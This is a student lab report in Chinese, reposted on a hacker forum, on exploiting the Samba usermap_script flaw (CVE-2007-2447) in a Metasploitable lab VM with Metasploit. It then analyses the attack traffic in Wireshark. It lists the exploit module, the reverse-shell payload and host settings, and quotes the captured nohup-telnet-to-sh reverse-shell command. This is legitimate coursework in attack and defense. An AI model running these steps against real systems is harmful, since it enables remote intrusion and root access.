• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

20212924 2021-2022-2 《网络攻防实践》练习第9周报告(7次)


Recommended Posts

1.实践内容

samba 简介

Samba是一个在Linux和UNIX系统上实现SMB协议的免费软件。它由服务器和客户端程序组成。

像NFS桑巴一样,它是网络中文件共享的实现,但不幸的是,它不支持windows平台。samba是一个可以在任何支持SMB协议的主机之间共享文件的实现,当然也包括windows。

SMB是一种在局域网上共享文件和打印机的通信协议。它为局域网中不同计算机之间的文件和打印机提供共享服务。

SMB是一种C/S协议,通过该协议,客户端可以访问服务器上的共享文件系统、打印机和其他资源。

sername map script

UsernameScript是Samba协议的漏洞,ID为CVE-2007-2447,属于远程命令注入漏洞,主要影响Samba版本3.0.20到3.0.25rc3

139端口

139 NetBIOS文件和打印共享通过此端口进入的连接尝试获取NetBIOS/SMB服务。此协议用于Windows的“文件和打印机共享”和SAMBA。在互联网上共享你的硬盘可能是最常见的问题。39属于TCP协议。

2.实践过程

2.1使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。

具体步骤如下:

启动Metasploit软件,根据个人喜好可以使用msfconsole、msfgui、msfweb中的一种;

exploit:exploit/multi/samba/user map _ script渗透攻击模块;

选择攻击负载作为远程外壳(正向或反向连接);

设置渗透攻击参数(RHOST,LHOST,TARGET等。);

实施渗透攻击;

检查远程Shell获取是否正确,并检查获取的权限。

操作过程:

实验准备:

攻击机:卡利(A)

目标飞机:Metasploit表2 (B)

攻击目标漏洞:Samba服务usermap_script安全漏洞

适配器:VMnet8(NAT模式)

查看IP截图:

ugqewsa45rb3218.png

uryaxbld0i33219.png

查看是否可以ping通对方的截图:

bw342tyb1x33220.png

vhzvbcyyaxl3221.png

操作如下所示:

(1)进入控制台:通过msfconsole指令进入控制台。

w.icode9.com/i/l/?n=22&i=blog/2773285/202204/2773285-20220425191126936-1340771139.png"/>

(2)进行相关设置:

  • 通过search usermap_script查找漏洞信息
    maszingfzka3222.png
  • 通过use exploit/multi/samba/usermap_script使用相关攻击脚本
  • show payloads查看payload类型
    hkk0p543v0v3223.png
  • 使用set payload cmd/unix/reverse选择攻击PAYLOAD
  • 使用set LHOST 192.168.200.6set RHOST 192.168.200.123进行表示攻击机IP地址和靶机IP地址设置
    fjxmuzry1aj3224.png

(3)攻击:设置完成后,使用exploit进行攻击。
zmev1hgfjfy3225.png

(4)验证:攻击完成后,根据提示操作得到远程shell,我们使用ifconfig查询靶机IP,靶机IP成功获取。通过和靶机ifconfig查询结果对比,IP相关信息无误。表明攻击成功。

(5)查看提权是否成功:通过id查看shell权限。再通过whoami查询,发现我们已经获得了root权限,而靶机仍然是非root账号登录,这表明提权成功。
zhbwccfmyz03226.png

2.2 攻防对抗实践

任务:

  • 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

  • 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

实践过程:

  • 本任务选择攻击的漏洞为任务一所攻击漏洞,因此攻击操作与任务一相同
    i1gjzbjh5pj3227.png
    etxqn0a1mfo3228.png

  • 下面主要对Wireshark抓包内容进行分析。

    • (1)Wireshark进行抓包,我们可以得到攻击者IP为192.168.200.6,目标IP为192.168.200.123,目标端口为139。经过查询可知139号端口是Unix中的Samba服务端口,可知攻击利用了Samba服务漏洞。攻击发起时间是从ARP协议的询问开始。
      dq3utnhi34y3229.png
    • (2)从第一个SMB数据包中分析数据流,找到shellcode如图所示。其中,nohupno hang up的缩写,就是不挂断的意思,用nohup运行命令可以使命令永久的执行下去,和用户终端没有关系;telnet 192.168.200.6 4444表明数据是通过4444号通信端口管控传入攻击机的;sh是linux中运行shell的命令,是shell的解释器。
      mwf14enrkyr3230.png
    • (3)通过进一步的tcp流分析,我们可以看到成功之后在本地执行命令的信息。

3.学习中遇到的问题及解决

  • 问题1: 认为Metasploitable 靶机上不了网,导致使用exploit进行攻击时无法响应。
    uavx5ljlc1v3231.png
  • 问题1解决方案:实际上Metasploitable 靶机不用上网,也可以进行实验,exploit成功后在kali里可以直接输入命令。

4.实践总结

  • 本次实验与上周实验相比,由window系统转向linux系统,操作过程基本相同,区别较大的时漏洞荷载,由于系统的不同攻击的漏洞荷载完全不同,攻击手段也不一样。
  • 通过两次使用Metasploit软件,巩固强化了对该软件的操作过程理解,也更加深刻的理解了一些常见的命令。
  • 当然对wireshark进行抓包越来越熟练,但对数据包的分析与理解仍然需要继续深入理解。

参考资料

  • Samba 服务详解
  • 《Metasploit渗透测试魔鬼训练营》笔记(一)
  • 139端口
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now